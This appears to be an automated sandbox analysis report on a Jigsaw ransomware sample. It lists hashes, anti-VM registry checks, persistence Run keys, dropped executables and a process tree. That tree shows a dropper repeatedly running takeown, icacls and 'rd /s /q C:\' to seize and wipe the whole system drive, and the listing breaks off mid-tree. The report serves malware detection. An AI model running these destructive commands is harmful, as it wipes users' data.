jigsaw | 0fc9a98ed6bad1f94e0357b6bb833b4eca20bea119abc0cdfa3bb4caeeddcda1

Analysis

max time kernel
7s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
22-07-2024 19:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
Size

10.1MB
MD5

97f44c7df82adc19ce025cfc8958245c
SHA1

699fb553ea85db7c6c5fc5118ab7a1a0c3b19602
SHA256

0fc9a98ed6bad1f94e0357b6bb833b4eca20bea119abc0cdfa3bb4caeeddcda1
SHA512

e2da423ba4eee8f4e836f5eeed82bfe9cf482a911200f805dcdff20d41901c73b40faf187c66ef2e32f9ec8f6d565c43f38229c026285dd0411d4c1c8c22c27e
SSDEEP

196608:QbxNMGrnhzvYf9EfmiAf1qkB8I9r1UhraBMBMBR:kMGr4+BAf1qC1caBMWBR

Score

10^/10

jigsaw discovery evasion exploit persistence ransomware

Malware Config

Signatures

Jigsaw Ransomware
Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.
ransomware jigsaw

Enumerates VirtualBox registry keys 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\Registry\Machine\SYSTEM\ControlSet001\Services\VBoxGuest	a.exe
Key opened	\Registry\Machine\SYSTEM\ControlSet001\Services\VBoxMouse	a.exe
Key opened	\Registry\Machine\SYSTEM\ControlSet001\Services\VBoxService	a.exe
Key opened	\Registry\Machine\SYSTEM\ControlSet001\Services\VBoxSF	a.exe
Key opened	\Registry\Machine\SYSTEM\ControlSet001\Services\VBoxVideo	a.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\ACPI\DSDT\VBOX__	a.exe
Key opened	\Registry\Machine\HARDWARE\ACPI\FADT\VBOX__	a.exe
Key opened	\Registry\Machine\HARDWARE\ACPI\RSDT\VBOX__	a.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\Registry\Machine\SOFTWARE\Oracle\VirtualBox Guest Additions	a.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\RwDrv.sys	l.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\Registry\Machine\SOFTWARE\VMware, Inc.\VMware Tools	a.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
10848	icacls.exe
6788	takeown.exe
6908	icacls.exe
10512	takeown.exe
7408	icacls.exe
6564	takeown.exe
6564	takeown.exe
12248	takeown.exe
5996	takeown.exe
7360	icacls.exe
5340	icacls.exe
6436	takeown.exe
7152	icacls.exe
8164	takeown.exe
10484	takeown.exe
10600	takeown.exe
5840	takeown.exe
5652	takeown.exe
8656	takeown.exe
5980	icacls.exe
4724	icacls.exe
9040	icacls.exe
7416	icacls.exe
8788	icacls.exe
4464	takeown.exe
6656	icacls.exe
9960	takeown.exe
9696	icacls.exe
10328	icacls.exe
9780	takeown.exe
11288	takeown.exe
2916	icacls.exe
5532	takeown.exe
6052	takeown.exe
6084	icacls.exe
9128	icacls.exe
10552	icacls.exe
10948	takeown.exe
8028	takeown.exe
8440	icacls.exe
5616	takeown.exe
9708	takeown.exe
9856	icacls.exe
9280	icacls.exe
9744	takeown.exe
1572	takeown.exe
8640	icacls.exe
9280	takeown.exe
5488	icacls.exe
6708	icacls.exe
6112	takeown.exe
8404	takeown.exe
8968	icacls.exe
5964	icacls.exe
9416	takeown.exe
6268	takeown.exe
7348	takeown.exe
7524	icacls.exe
1696	icacls.exe
8424	icacls.exe
7084	icacls.exe
6660	icacls.exe
7764	takeown.exe
748	takeown.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	jigsaw.exe

Executes dropped EXE 9 IoCs

pid	Process
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
2132	jigsaw.exe
5012	a.exe
3368	c.exe
3612	f.exe
4152	l.exe
4632	z.exe
1604	drpbx.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4724	icacls.exe
7292	takeown.exe
11852	takeown.exe
11748	icacls.exe
5824	takeown.exe
10636	icacls.exe
8496	takeown.exe
6268	takeown.exe
7176	icacls.exe
7768	icacls.exe
10268	takeown.exe
2172	icacls.exe
8832	icacls.exe
10608	icacls.exe
11928	takeown.exe
2916	icacls.exe
5840	icacls.exe
8704	takeown.exe
4128	takeown.exe
9200	takeown.exe
9696	icacls.exe
7412	icacls.exe
11888	takeown.exe
5108	takeown.exe
5056	icacls.exe
1092	icacls.exe
7324	icacls.exe
10320	icacls.exe
748	takeown.exe
5340	takeown.exe
11340	takeown.exe
1868	icacls.exe
5616	takeown.exe
5588	takeown.exe
8180	takeown.exe
10064	icacls.exe
10848	icacls.exe
5844	takeown.exe
6644	takeown.exe
6564	takeown.exe
9124	takeown.exe
4128	takeown.exe
10600	icacls.exe
6680	takeown.exe
7152	takeown.exe
8220	takeown.exe
8492	icacls.exe
6708	icacls.exe
8028	takeown.exe
11796	takeown.exe
8544	icacls.exe
1868	takeown.exe
8656	takeown.exe
10020	icacls.exe
6220	takeown.exe
5972	icacls.exe
8320	icacls.exe
7448	icacls.exe
11196	icacls.exe
5016	icacls.exe
7172	icacls.exe
9744	takeown.exe
8988	takeown.exe
8340	takeown.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyGigaPp = "C:\\Users\\Admin\\thirdpartyclamavinstaller0.exe"	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe"	jigsaw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jahrein = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rebcoana.exe"	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Media = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.exe\""	z.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks system information in the registry 2 TTPs 1 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	a.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
5012	a.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\Alphabet.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\msadc\en-US\msdaprsr.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\main\zh-phonetic.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\msvcp120.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\APICLI~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\ado\msado21.tlb	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\de\WindowsBase.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\en-US\TipRes.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\lv-LV\tipresx.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\APPVIN~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\Java\jdk-1.8\jre\lib\javaws.jar	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\PresentationFramework.Royale.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\osknav\osknavbase.xml	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\de\System.RunTime.Serialization.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\ado\msado15.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\oskclearui.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\ado\msado15.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\main\zh-phonetic.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\en-US\TipTsf.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\ipsptg.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\ko-KR\tipresx.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\msix.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\ipsfin.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\APPVIS~2.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\es\System.IdentityModel.Selectors.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\APPVCA~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\symbols\ea-sym.xml	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\System.IdentityModel.Selectors.dll	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\WindowsBase.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\msadc\msadcer.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\APPVPO~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\APPVIS~3.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\oskpred.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\oskmenu\oskmenubase.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\Ole DB\en-US\oledb32r.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\de\UIAutomationProvider.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\it-IT\mshwLatin.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\ado\msador15.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\Ole DB\sqlxmlx.rll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\VCRUNT~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\es-ES\TipTsf.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\it-IT\tipresx.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\es-ES\rtscom.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\oskpred\oskpredbase.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\th-TH\tipresx.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\ado\msadox.dll	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\ja\ReachFramework.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\fr\System.Printing.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\osknav.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\Ole DB\en-US\msdasqlr.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\Java\jdk-1.8\jre\lib\ext\SUNJCE~1.JAR	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\ipsdan.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\ja-JP\InputPersonalization.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\Alphabet.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\main\base_heb.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\CLICKT~1\APPVIS~3.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\UIAutomationClientsideProviders.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\de-DE\InputPersonalization.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\main\base_altgr.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\System\Ole DB\sqlxmlx.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\symbols.xml	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\fsdefinitions\oskclearui\oskclearuibase.xml	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\ja\System.ServiceModel.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\uk-UA\TabTip.exe.mui	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
8588	4604	WerFault.exe	87
11524	3280	WerFault.exe	89

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
5012	a.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
3280	thirdpartyclamavinstaller.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
3280	thirdpartyclamavinstaller.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
4604	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
3280	thirdpartyclamavinstaller.exe
4604	thirdpartyclamavinstaller.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
Token: SeDebugPrivilege	3280	thirdpartyclamavinstaller.exe
Token: SeDebugPrivilege	4604	thirdpartyclamavinstaller.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3612	f.exe
3612	f.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 4604	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	87
PID 2372 wrote to memory of 4604	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	87
PID 2372 wrote to memory of 4604	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	87
PID 2372 wrote to memory of 2896	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	88
PID 2372 wrote to memory of 2896	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	88
PID 2372 wrote to memory of 2896	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	88
PID 2372 wrote to memory of 3280	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	89
PID 2372 wrote to memory of 3280	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	89
PID 2372 wrote to memory of 3280	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	89
PID 2372 wrote to memory of 4924	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	91
PID 2372 wrote to memory of 4924	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	91
PID 2372 wrote to memory of 4924	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	91
PID 2372 wrote to memory of 2972	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	92
PID 2372 wrote to memory of 2972	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	92
PID 2372 wrote to memory of 2972	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	92
PID 2372 wrote to memory of 3504	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	93
PID 2372 wrote to memory of 3504	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	93
PID 2372 wrote to memory of 3504	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	93
PID 2372 wrote to memory of 2132	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	156
PID 2372 wrote to memory of 2132	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	156
PID 2372 wrote to memory of 3044	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	96
PID 2372 wrote to memory of 3044	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	96
PID 2372 wrote to memory of 3044	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	96
PID 2372 wrote to memory of 5012	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	99
PID 2372 wrote to memory of 5012	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	99
PID 2372 wrote to memory of 2092	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	101
PID 2372 wrote to memory of 2092	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	101
PID 2372 wrote to memory of 2092	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	101
PID 2372 wrote to memory of 1632	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	102
PID 2372 wrote to memory of 1632	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	102
PID 2372 wrote to memory of 1632	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	102
PID 2372 wrote to memory of 3368	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	103
PID 2372 wrote to memory of 3368	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	103
PID 2372 wrote to memory of 3368	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	103
PID 2372 wrote to memory of 5092	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	104
PID 2372 wrote to memory of 5092	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	104
PID 2372 wrote to memory of 5092	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	104
PID 2372 wrote to memory of 3612	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	109
PID 2372 wrote to memory of 3612	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	109
PID 2372 wrote to memory of 3612	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	109
PID 2372 wrote to memory of 440	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	110
PID 2372 wrote to memory of 440	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	110
PID 2372 wrote to memory of 440	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	110
PID 2372 wrote to memory of 4152	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	112
PID 2372 wrote to memory of 4152	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	112
PID 2372 wrote to memory of 4152	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	112
PID 2372 wrote to memory of 2848	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	113
PID 2372 wrote to memory of 2848	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	113
PID 2372 wrote to memory of 2848	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	113
PID 2372 wrote to memory of 4560	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	114
PID 2372 wrote to memory of 4560	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	114
PID 2372 wrote to memory of 4560	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	114
PID 2372 wrote to memory of 4632	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	115
PID 2372 wrote to memory of 4632	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	115
PID 2372 wrote to memory of 4632	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	115
PID 2372 wrote to memory of 3812	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	116
PID 2372 wrote to memory of 3812	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	116
PID 2372 wrote to memory of 3812	2372	2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe	116
PID 3280 wrote to memory of 3712	3280	thirdpartyclamavinstaller.exe	218
PID 3280 wrote to memory of 3712	3280	thirdpartyclamavinstaller.exe	218
PID 3280 wrote to memory of 3712	3280	thirdpartyclamavinstaller.exe	218
PID 4604 wrote to memory of 1624	4604	thirdpartyclamavinstaller.exe	118
PID 4604 wrote to memory of 1624	4604	thirdpartyclamavinstaller.exe	118
PID 4604 wrote to memory of 1624	4604	thirdpartyclamavinstaller.exe	118

C:\Users\Admin\AppData\Local\Temp\2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe
"C:\Users\Admin\AppData\Local\Temp\2024-07-22_97f44c7df82adc19ce025cfc8958245c_snake.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller.exe
  "C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4604
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:4832
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:5108
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:4464
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:5056
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2132
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:3400
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:4828
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4724
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:4308
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:1572
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4280
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:1420
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4464
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:2920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4716
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
